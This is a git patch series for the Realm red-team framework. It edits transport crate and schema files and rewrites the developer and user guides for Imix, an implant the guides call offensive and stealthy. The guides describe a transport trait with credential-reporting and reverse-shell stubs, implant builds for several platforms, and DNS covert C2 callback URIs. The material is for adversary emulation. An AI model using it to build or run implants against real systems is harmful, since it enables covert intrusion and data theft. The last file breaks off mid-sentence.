- -[features] -default = [] -grpc = ["pb/grpc"] -grpc-doh = ["grpc", "dep:hickory-resolver"] -http1 = ["pb/http1"] -dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] -mock = ["dep:mockall"] - -[dependencies] -pb = { workspace = true } - -anyhow = { workspace = true } -bytes = { workspace = true } -futures = { workspace = true } -log = { workspace = true } -prost = { workspace = true } -prost-types = { workspace = true } -tokio = { workspace = true, features = ["macros", "rt-multi-thread"] } -tokio-stream = { workspace = true } -tonic = { workspace = true, features = ["tls-webpki-roots"] } -trait-variant = { workspace = true } -hyper = { version = "0.14", features = [ - "client", -] } # Had to user an older version of hyper to support hyper-proxy -hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} -hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } -base32 = { version = "0.5", optional = true } -rand = { workspace = true, optional = true } -url = { version = "2.5", optional = true } - -# [feature = mock] -mockall = { workspace = true, optional = true } +[package] +name = "transport" +version = "0.0.5" +edition = "2021" + +[features] +default = [] +grpc = ["pb/grpc"] +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = ["pb/http1"] +dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] +mock = ["dep:mockall"] + +[dependencies] +pb = { workspace = true } + +anyhow = { workspace = true } +bytes = { workspace = true } +futures = { workspace = true } +log = { workspace = true } +prost = { workspace = true } +prost-types = { workspace = true } +tokio = { workspace = true, features = ["macros", "rt-multi-thread"] } +tokio-stream = { workspace = true } +tonic = { workspace = true, features = ["tls-webpki-roots"] } +trait-variant = { workspace = true } +hyper = { version = "0.14", features = [ + "client", +] } # Had to user an older version of hyper to support hyper-proxy +hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} +hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } +base32 = { version = "0.5", optional = true } +rand = { workspace = true, optional = true } +url = { version = "2.5", optional = true } + +# [feature = mock] +mockall = { workspace = true, optional = true } From f2630c486dc65a919ec316c67b37b53fc1515730 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 23:45:44 -0600 Subject: [PATCH 14/17] missed transport in schema --- tavern/internal/ent/migrate/schema.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tavern/internal/ent/migrate/schema.go b/tavern/internal/ent/migrate/schema.go index d1a262d48..78c9db8ba 100644 --- a/tavern/internal/ent/migrate/schema.go +++ b/tavern/internal/ent/migrate/schema.go @@ -21,7 +21,7 @@ var ( {Name: "last_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "next_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "interval", Type: field.TypeUint64, Nullable: true}, - {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED"}}, + {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED"}}, {Name: "beacon_host", Type: field.TypeInt}, } // BeaconsTable holds the schema information for the "beacons" table. From fc66356b9351c63c388913b3dff3986c3b685d96 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Thu, 25 Dec 2025 12:37:26 -0600 Subject: [PATCH 15/17] Line endings --- docs/_docs/dev-guide/imix.md | 570 +++++++++++++++++----------------- docs/_docs/user-guide/imix.md | 480 ++++++++++++++-------------- 2 files changed, 525 insertions(+), 525 deletions(-) diff --git a/docs/_docs/dev-guide/imix.md b/docs/_docs/dev-guide/imix.md index ff875bf2c..bea5aa0a4 100644 --- a/docs/_docs/dev-guide/imix.md +++ b/docs/_docs/dev-guide/imix.md @@ -1,285 +1,285 @@ ---- -title: Imix -tags: - - Dev Guide -description: Want to implement new functionality in the agent? Start here! -permalink: dev-guide/imix ---- - -## Overview - -Imix in the main bot for Realm. - -## Host Selector - -The host selector defined in `implants/lib/host_selector` allow imix to reliably identify which host it's running on. This is helpful for operators when creating tasking across multiple beacons as well as when searching for command results. Uniqueness is stored as a UUID4 value. - -Out of the box realm comes with two options `File` and `Env` to determine what host it's on. - -`File` will create a file on disk that stores the UUID4 Eg. Linux: - -```bash -[~]$ cat /etc/system-id -36b3c472-d19b-46cc-b3e6-ee6fd8da5b9c -``` - -`Env` will read from the agent environment variables looking for `IMIX_HOST_ID` if it's set it will use the UUID4 string set there. - -There is a third option available on Windows systems to store the UUID value inside a registry key. Follow the steps below to update `lib.rs` to include `Registry` as a default before `File` to enable it. On hosts that are not Windows, imix will simply skip `Registry`. - -If no selectors succeed a random UUID4 ID will be generated and used for the bot. This should be avoided. - -## Develop A Host Uniqueness Selector - -To create your own: - -- Navigate to `implants/lib/host_unique` -- Create a file for your selector `touch mac_address.rs` -- Create an implementation of the `HostIDSelector` - -```rust -use uuid::Uuid; - -use crate::HostIDSelector; - -pub struct MacAddress {} - -impl Default for MacAddress { - fn default() -> Self { - MacAddress {} - } -} - -impl HostIDSelector for MacAddress { - fn get_name(&self) -> String { - "mac_address".to_string() - } - - fn get_host_id(&self) -> Option { - // Get the mac address - // Generate a UUID using it - // Return the UUID - // Return None if anything fails - } -} - -#[cfg(test)] -mod tests { - use uuid::uuid; - - use super::*; - - #[test] - fn test_id_mac_consistent() { - let selector = MacAddress {}; - let id_one = selector.get_host_id(); - let id_two = selector.get_host_id(); - - assert_eq!(id_one, id_two); - } -} -``` - -- Update `lib.rs` to re-export your implementation - -```rust -mod mac_address; -pub use mac_address::MacAddress; -``` - -- Update the `defaults()` function to include your implementation. N.B. The order from left to right is the order engines will be evaluated. - -## Develop a New Transport - -We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. - -### Current Available Transports - -Realm currently includes three transport implementations: - -- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) -- **`http1`** - HTTP/1.1 transport -- **`dns`** - DNS-based covert channel transport - -**Note:** Only one transport may be selected at compile time. The build will fail if multiple transport features are enabled simultaneously. - -### Creating a New Transport - -If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. For example, - -```rust -#[derive(Debug, Clone)] -pub struct Custom { - // Your connection state here - // e.g., client: Option -} -``` - -**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. - -Next, we need to implement the Transport trait for our new struct. This will look like: - -```rust -impl Transport for Custom { - fn init() -> Self { - Custom { - // Initialize your connection state here - // e.g., client: None - } - } - fn new(callback: String, proxy_uri: Option) -> Result { - // TODO: setup connection/client hook in proxy, anything else needed - // before functions get called. - Err(anyhow!("Unimplemented!")) - } - async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { - // TODO: How you wish to handle the `claim_tasks` method. - Err(anyhow!("Unimplemented!")) - } - async fn fetch_asset( - &mut self, - request: FetchAssetRequest, - tx: std::sync::mpsc::Sender, - ) -> Result<()> { - // TODO: How you wish to handle the `fetch_asset` method. - Err(anyhow!("Unimplemented!")) - } - async fn report_credential( - &mut self, - request: ReportCredentialRequest, - ) -> Result { - // TODO: How you wish to handle the `report_credential` method. - Err(anyhow!("Unimplemented!")) - } - async fn report_file( - &mut self, - request: std::sync::mpsc::Receiver, - ) -> Result { - // TODO: How you wish to handle the `report_file` method. - Err(anyhow!("Unimplemented!")) - } - async fn report_process_list( - &mut self, - request: ReportProcessListRequest, - ) -> Result { - // TODO: How you wish to handle the `report_process_list` method. - Err(anyhow!("Unimplemented!")) - } - async fn report_task_output( - &mut self, - request: ReportTaskOutputRequest, - ) -> Result { - // TODO: How you wish to handle the `report_task_output` method. - Err(anyhow!("Unimplemented!")) - } - async fn reverse_shell( - &mut self, - rx: tokio::sync::mpsc::Receiver, - tx: tokio::sync::mpsc::Sender, - ) -> Result<()> { - // TODO: How you wish to handle the `reverse_shell` method. - Err(anyhow!("Unimplemented!")) - } -} -``` - -NOTE: Be Aware that currently `reverse_shell` uses tokio's sender/reciever while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currenlty it would just result in performance loss/less maintainable code. - -After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: - -#### 1. Add Compile-Time Exclusivity Checks - -In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: - -```rust -// Add your transport to the mutual exclusivity checks -#[cfg(all(feature = "grpc", feature = "custom"))] -compile_error!("only one transport may be selected"); -#[cfg(all(feature = "http1", feature = "custom"))] -compile_error!("only one transport may be selected"); -#[cfg(all(feature = "dns", feature = "custom"))] -compile_error!("only one transport may be selected"); - -// ... existing checks above ... - -// Add your transport module and export -#[cfg(feature = "custom")] -mod custom; -#[cfg(feature = "custom")] -pub use custom::Custom as ActiveTransport; -``` - -**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. - -#### 2. Update Transport Library Dependencies - -Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: - -```toml -# more stuff above - -[features] -default = [] -grpc = [] -grpc-doh = ["grpc", "dep:hickory-resolver"] -http1 = [] -dns = ["dep:data-encoding", "dep:rand"] -custom = ["dep:your-custom-dependency"] # <-- Add your feature here -mock = ["dep:mockall"] - -[dependencies] -# ... existing dependencies ... - -# Add any dependencies needed by your transport -your-custom-dependency = { version = "1.0", optional = true } - -# more stuff below -``` - -#### 3. Enable Your Transport in Imix - -To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: - -```toml -# more stuff above - -[features] -# Check if compiled by imix -win_service = [] -default = ["transport/grpc"] # Default transport -http1 = ["transport/http1"] -dns = ["transport/dns"] -custom = ["transport/custom"] # <-- Add your feature here -transport-grpc-doh = ["transport/grpc-doh"] - -# more stuff below -``` - -#### 4. Build Imix with Your Transport - -Compile imix with your custom transport: - -```bash -# From the repository root -cd implants/imix - -# Build with your transport feature -cargo build --release --features custom --no-default-features - -# Or for the default transport (grpc) -cargo build --release -``` - -**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. - -#### 5. Set Up the Corresponding Redirector - -For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: - -- `tavern/internal/redirectors/grpc/` - gRPC redirector -- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector -- `tavern/internal/redirectors/dns/` - DNS redirector - -Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. - -And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. +--- +title: Imix +tags: + - Dev Guide +description: Want to implement new functionality in the agent? Start here! +permalink: dev-guide/imix +--- + +## Overview + +Imix in the main bot for Realm. + +## Host Selector + +The host selector defined in `implants/lib/host_selector` allow imix to reliably identify which host it's running on. This is helpful for operators when creating tasking across multiple beacons as well as when searching for command results. Uniqueness is stored as a UUID4 value. + +Out of the box realm comes with two options `File` and `Env` to determine what host it's on. + +`File` will create a file on disk that stores the UUID4 Eg. Linux: + +```bash +[~]$ cat /etc/system-id +36b3c472-d19b-46cc-b3e6-ee6fd8da5b9c +``` + +`Env` will read from the agent environment variables looking for `IMIX_HOST_ID` if it's set it will use the UUID4 string set there. + +There is a third option available on Windows systems to store the UUID value inside a registry key. Follow the steps below to update `lib.rs` to include `Registry` as a default before `File` to enable it. On hosts that are not Windows, imix will simply skip `Registry`. + +If no selectors succeed a random UUID4 ID will be generated and used for the bot. This should be avoided. + +## Develop A Host Uniqueness Selector + +To create your own: + +- Navigate to `implants/lib/host_unique` +- Create a file for your selector `touch mac_address.rs` +- Create an implementation of the `HostIDSelector` + +```rust +use uuid::Uuid; + +use crate::HostIDSelector; + +pub struct MacAddress {} + +impl Default for MacAddress { + fn default() -> Self { + MacAddress {} + } +} + +impl HostIDSelector for MacAddress { + fn get_name(&self) -> String { + "mac_address".to_string() + } + + fn get_host_id(&self) -> Option { + // Get the mac address + // Generate a UUID using it + // Return the UUID + // Return None if anything fails + } +} + +#[cfg(test)] +mod tests { + use uuid::uuid; + + use super::*; + + #[test] + fn test_id_mac_consistent() { + let selector = MacAddress {}; + let id_one = selector.get_host_id(); + let id_two = selector.get_host_id(); + + assert_eq!(id_one, id_two); + } +} +``` + +- Update `lib.rs` to re-export your implementation + +```rust +mod mac_address; +pub use mac_address::MacAddress; +``` + +- Update the `defaults()` function to include your implementation. N.B. The order from left to right is the order engines will be evaluated. + +## Develop a New Transport + +We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. + +### Current Available Transports + +Realm currently includes three transport implementations: + +- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) +- **`http1`** - HTTP/1.1 transport +- **`dns`** - DNS-based covert channel transport + +**Note:** Only one transport may be selected at compile time. The build will fail if multiple transport features are enabled simultaneously. + +### Creating a New Transport + +If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. For example, + +```rust +#[derive(Debug, Clone)] +pub struct Custom { + // Your connection state here + // e.g., client: Option +} +``` + +**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. + +Next, we need to implement the Transport trait for our new struct. This will look like: + +```rust +impl Transport for Custom { + fn init() -> Self { + Custom { + // Initialize your connection state here + // e.g., client: None + } + } + fn new(callback: String, proxy_uri: Option) -> Result { + // TODO: setup connection/client hook in proxy, anything else needed + // before functions get called. + Err(anyhow!("Unimplemented!")) + } + async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { + // TODO: How you wish to handle the `claim_tasks` method. + Err(anyhow!("Unimplemented!")) + } + async fn fetch_asset( + &mut self, + request: FetchAssetRequest, + tx: std::sync::mpsc::Sender, + ) -> Result<()> { + // TODO: How you wish to handle the `fetch_asset` method. + Err(anyhow!("Unimplemented!")) + } + async fn report_credential( + &mut self, + request: ReportCredentialRequest, + ) -> Result { + // TODO: How you wish to handle the `report_credential` method. + Err(anyhow!("Unimplemented!")) + } + async fn report_file( + &mut self, + request: std::sync::mpsc::Receiver, + ) -> Result { + // TODO: How you wish to handle the `report_file` method. + Err(anyhow!("Unimplemented!")) + } + async fn report_process_list( + &mut self, + request: ReportProcessListRequest, + ) -> Result { + // TODO: How you wish to handle the `report_process_list` method. + Err(anyhow!("Unimplemented!")) + } + async fn report_task_output( + &mut self, + request: ReportTaskOutputRequest, + ) -> Result { + // TODO: How you wish to handle the `report_task_output` method. + Err(anyhow!("Unimplemented!")) + } + async fn reverse_shell( + &mut self, + rx: tokio::sync::mpsc::Receiver, + tx: tokio::sync::mpsc::Sender, + ) -> Result<()> { + // TODO: How you wish to handle the `reverse_shell` method. + Err(anyhow!("Unimplemented!")) + } +} +``` + +NOTE: Be Aware that currently `reverse_shell` uses tokio's sender/reciever while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currenlty it would just result in performance loss/less maintainable code. + +After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: + +#### 1. Add Compile-Time Exclusivity Checks + +In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: + +```rust +// Add your transport to the mutual exclusivity checks +#[cfg(all(feature = "grpc", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "dns", feature = "custom"))] +compile_error!("only one transport may be selected"); + +// ... existing checks above ... + +// Add your transport module and export +#[cfg(feature = "custom")] +mod custom; +#[cfg(feature = "custom")] +pub use custom::Custom as ActiveTransport; +``` + +**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. + +#### 2. Update Transport Library Dependencies + +Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: + +```toml +# more stuff above + +[features] +default = [] +grpc = [] +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = [] +dns = ["dep:data-encoding", "dep:rand"] +custom = ["dep:your-custom-dependency"] # <-- Add your feature here +mock = ["dep:mockall"] + +[dependencies] +# ... existing dependencies ... + +# Add any dependencies needed by your transport +your-custom-dependency = { version = "1.0", optional = true } + +# more stuff below +``` + +#### 3. Enable Your Transport in Imix + +To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: + +```toml +# more stuff above + +[features] +# Check if compiled by imix +win_service = [] +default = ["transport/grpc"] # Default transport +http1 = ["transport/http1"] +dns = ["transport/dns"] +custom = ["transport/custom"] # <-- Add your feature here +transport-grpc-doh = ["transport/grpc-doh"] + +# more stuff below +``` + +#### 4. Build Imix with Your Transport + +Compile imix with your custom transport: + +```bash +# From the repository root +cd implants/imix + +# Build with your transport feature +cargo build --release --features custom --no-default-features + +# Or for the default transport (grpc) +cargo build --release +``` + +**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. + +#### 5. Set Up the Corresponding Redirector + +For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: + +- `tavern/internal/redirectors/grpc/` - gRPC redirector +- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector +- `tavern/internal/redirectors/dns/` - DNS redirector + +Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. + +And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index b9766887c..f291c861f 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -1,240 +1,240 @@ ---- -title: Imix -tags: - - User Guide -description: Imix User Guide -permalink: user-guide/imix ---- -## Imix - -Imix is an offensive security implant designed for stealthy communication and adversary emulation. It functions as a [Beacon](/user-guide/terminology#beacon), receiving [Eldritch](/user-guide/terminology#eldritch) packages called [Tomes](/user-guide/terminology#tome) from a central server ([Tavern](/admin-guide/tavern)) and evaluating them on the host system. It currently supports [gRPC over HTTP(s)](https://grpc.io/) as it's primary communication mechanism, but can be extended to support additional transport channels (see the [developer guide](/dev-guide/tavern#agent-development) for more info). - -## Configuration - -Imix has compile-time configuration, that may be specified using environment variables during `cargo build`. - -**We strongly recommend building agents inside the provided devcontainer `.devcontainer`** -Building in the dev container limits variables that might cause issues and is the most tested way to compile. - -| Env Var | Description | Default | Required | -| ------- | ----------- | ------- | -------- | -| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No | -| IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | automatic | Yes | -| IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | -| IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | -| IMIX_PROXY_URI | Overide system settings for proxy URI over HTTP(S) (must specify a scheme, e.g. `https://`) | No proxy | No | -| IMIX_HOST_ID | Manually specify the host ID for this beacon. Supersedes the file on disk. | - | No | -| IMIX_RUN_ONCE | Imix will only do one callback and execution of queued tasks (may want to pair with runtime environment variable `IMIX_BEACON_ID`) | false | No | - -Imix has run-time configuration, that may be specified using environment variables during execution. - -| Env Var | Description | Default | Required | -| ------- | ----------- | ------- | -------- | -| IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | -| IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No | - - - -## Logging - -At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. - -## Installation - -The install subcommand executes embedded tomes similar to golem. -It will loop through all embedded files looking for main.eldritch. -Each main.eldritch will execute in a new thread. This is done to allow imix to install redundantly or install additional (non dependent) tools. - -Installation scripts are specified in the `realm/implants/imix/install_scripts` directory. - -This feature is currently under active development, and may change. We'll do our best to keep these docs updates in the meantime. - -## Functionality - -Imix derives all it's functionality from the eldritch language. -See the [Eldritch User Guide](/user-guide/eldritch) for more information. - -## Task management - -Imix can execute up to 127 threads concurrently after that the main imix thread will block behind other threads. -Every callback interval imix will query each active thread for new output and rely that back to the c2. This means even long running tasks will report their status as new data comes in. - -## Proxy support - -Imix's default `grpc` transport supports http and https proxies for outbound communication. -By default imix will try to determine the systems proxy settings: - -- On Linux reading the environment variables `http_proxy` and then `https_proxy` -- On Windows - we cannot automatically determine the default proxy -- On MacOS - we cannot automatically determine the default proxy -- On FreeBSD - we cannot automatically determine the default proxy - -## Identifying unique hosts - -Imix communicates which host it's on to Tavern enabling operators to reliably perform per host actions. The default way that imix does this is through a file on disk. We recognize that this may be un-ideal for many situations so we've also provided an environment override and made it easy for admins managing a realm deployment to change how the bot determines uniqueness. - -Imix uses the `host_unique` library under `implants/lib/host_unique` to determine which host it's on. The `id` function will fail over all available options returning the first successful ID. If a method is unable to determine the uniqueness of a host it should return `None`. - -We recommend that you use the `File` for the most reliability: - -- Exists across reboots -- Guaranteed to be unique per host (because the bot creates it) -- Can be used by multiple instances of the beacon on the same host. - -If you cannot use the `File` selector we highly recommend manually setting the `Env` selector with the environment variable `IMIX_HOST_ID`. This will override the `File` one avoiding writes to disk but must be managed by the operators. - -For Windows hosts, a `Registry` selector is available, but must be enabled before compilation. See the [imix dev guide](/dev-guide/imix#host-selector) on how to enable it. - -If all uniqueness selectors fail imix will randomly generate a UUID to avoid crashing. -This isn't ideal as in the UI each new beacon will appear as thought it were on a new host. - -## Static cross compilation - -**We strongly recommend building agents inside the provided devcontainer `.devcontainer`** -Building in the dev container limits variables that might cause issues and is the most tested way to compile. - -**Imix requires a server public key so it can encrypt messsages to and from the server check the server log for `level=INFO msg="public key: "`. This base64 encoded string should be passed to the agent using the environment variable `IMIX_SERVER_PUBKEY`** - -## Optional build flags - -These flags are passed to cargo build Eg.: -`cargo build --release --bin imix --bin imix --target=x86_64-unknown-linux-musl --features foo-bar` - -- `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport -- `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector. -- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI. - -## Setting encryption key - -By default imix will automatically collect the IMIX_CALLBACK_URI server's public key during the build process. This can be overridden by manually setinng the `IMIX_SERVER_PUBKEY` environment variable but should only be necesarry when using redirectors. Redirectors have no visibliity into the realm encryption by design, this means that agents must be compiled with the upstream tavern instance's public key. - -A server's public key can be found using: -```bash -export IMIX_SERVER_PUBKEY="$(curl $IMIX_CALLBACK_URI/status | jq -r '.Pubkey')" -``` - -### Linux - -```bash -rustup target add x86_64-unknown-linux-musl - -sudo apt update -sudo apt install musl-tools -cd realm/implants/imix/ -export IMIX_CALLBACK_URI="http://localhost" - -cargo build --release --bin imix --target=x86_64-unknown-linux-musl -``` - -### MacOS - -**MacOS does not support static compilation** - - -[Apple's SDK and XCode TOS](https://www.apple.com/legal/sla/docs/xcode.pdf) require compilation be performed on apple hardware. Rust doesn't support cross compiling Linux -> MacOS out of the box due to dependencies on the above SDKs. In order to cross compile you first need to make the SDK available to the runtime. Below we've documented how you can compile MacOS binaries from the Linux devcontainer. - -#### Setup -Setup the MacOS SDK in a place that docker can access. -Rancher desktop doesn't allow you to mount folders besides ~/ and /tmp/ -therefore we need to copy it into an accesible location. -Run the following on your MacOS host: - -```bash -sudo cp -r $(readlink -f $(xcrun --sdk macosx --show-sdk-path)) ~/MacOSX.sdk -``` - -Modify .devcontainer/devcontainer.json by uncommenting the MacOSX.sdk mount. This will expose the newly copied SDK into the container allowing cargo to link against the MacOS SDK. -```json - "mounts": [ - "source=${localEnv:HOME}${localEnv:USERPROFILE}/MacOSX.sdk,target=/MacOSX.sdk,readonly,type=bind" - ], -``` - -#### Build -*Reopen realm in devcontainer* -```bash -cd realm/implants/imix/ -# Tell the linker to use the MacOSX.sdk -export SDKROOT="/MacOSX.sdk/"; export RUSTFLAGS="-Clink-arg=-isysroot -Clink-arg=/MacOSX.sdk -Clink-arg=-F/MacOSX.sdk/System/Library/Frameworks -Clink-arg=-L/MacOSX.sdk/usr/lib -Clink-arg=-lresolv" - -export IMIX_SERVER_PUBKEY="" - -cargo zigbuild --release --target aarch64-apple-darwin -``` - - -### Windows - -```bash -# Build imix -cd realm/implants/imix/ - -export IMIX_CALLBACK_URI="http://localhost" - -# Build imix.exe - cargo build --release --target=x86_64-pc-windows-gnu -# Build imix.svc.exe -cargo build --release --features win_service --target=x86_64-pc-windows-gnu -# Build imix.dll -cargo build --release --lib --target=x86_64-pc-windows-gnu -``` - - -## DNS Transport Configuration - -The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. - -### DNS URI Format - -When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: - -``` -dns://?domain=[&type=] -``` - -**Parameters:** -- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) -- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) -- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` - -**Examples:** - -```bash -# Use specific DNS server with TXT records (default) -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" - -# Use system resolver with fallbacks -export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" - -# Use multiple DNS servers with A records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" - -# Use AAAA records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" -``` - -### DNS Resolver Fallback - -When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. - -### Record Types - -| Type | Description | Use Case | -|------|-------------|----------| -| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | -| A | IPv4 address records | Lower profile, data encoded across multiple A records | -| AAAA | IPv6 address records | Medium profile, more data per record than A | - -### Protocol Details - -The DNS transport uses an async windowed protocol to handle UDP unreliability: - -- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) -- **Windowed sending**: Up to 10 packets are sent concurrently -- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks -- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails -- **CRC32 verification**: Data integrity is verified using CRC32 checksums - -**Limits:** -- Maximum data size: 50MB per request -- Maximum concurrent conversations on server: 10,000 +--- +title: Imix +tags: + - User Guide +description: Imix User Guide +permalink: user-guide/imix +--- +## Imix + +Imix is an offensive security implant designed for stealthy communication and adversary emulation. It functions as a [Beacon](/user-guide/terminology#beacon), receiving [Eldritch](/user-guide/terminology#eldritch) packages called [Tomes](/user-guide/terminology#tome) from a central server ([Tavern](/admin-guide/tavern)) and evaluating them on the host system. It currently supports [gRPC over HTTP(s)](https://grpc.io/) as it's primary communication mechanism, but can be extended to support additional transport channels (see the [developer guide](/dev-guide/tavern#agent-development) for more info). + +## Configuration + +Imix has compile-time configuration, that may be specified using environment variables during `cargo build`. + +**We strongly recommend building agents inside the provided devcontainer `.devcontainer`** +Building in the dev container limits variables that might cause issues and is the most tested way to compile. + +| Env Var | Description | Default | Required | +| ------- | ----------- | ------- | -------- | +| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No | +| IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | automatic | Yes | +| IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | +| IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | +| IMIX_PROXY_URI | Overide system settings for proxy URI over HTTP(S) (must specify a scheme, e.g. `https://`) | No proxy | No | +| IMIX_HOST_ID | Manually specify the host ID for this beacon. Supersedes the file on disk. | - | No | +| IMIX_RUN_ONCE | Imix will only do one callback and execution of queued tasks (may want to pair with runtime environment variable `IMIX_BEACON_ID`) | false | No | + +Imix has run-time configuration, that may be specified using environment variables during execution. + +| Env Var | Description | Default | Required | +| ------- | ----------- | ------- | -------- | +| IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | +| IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No | + + + +## Logging + +At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these 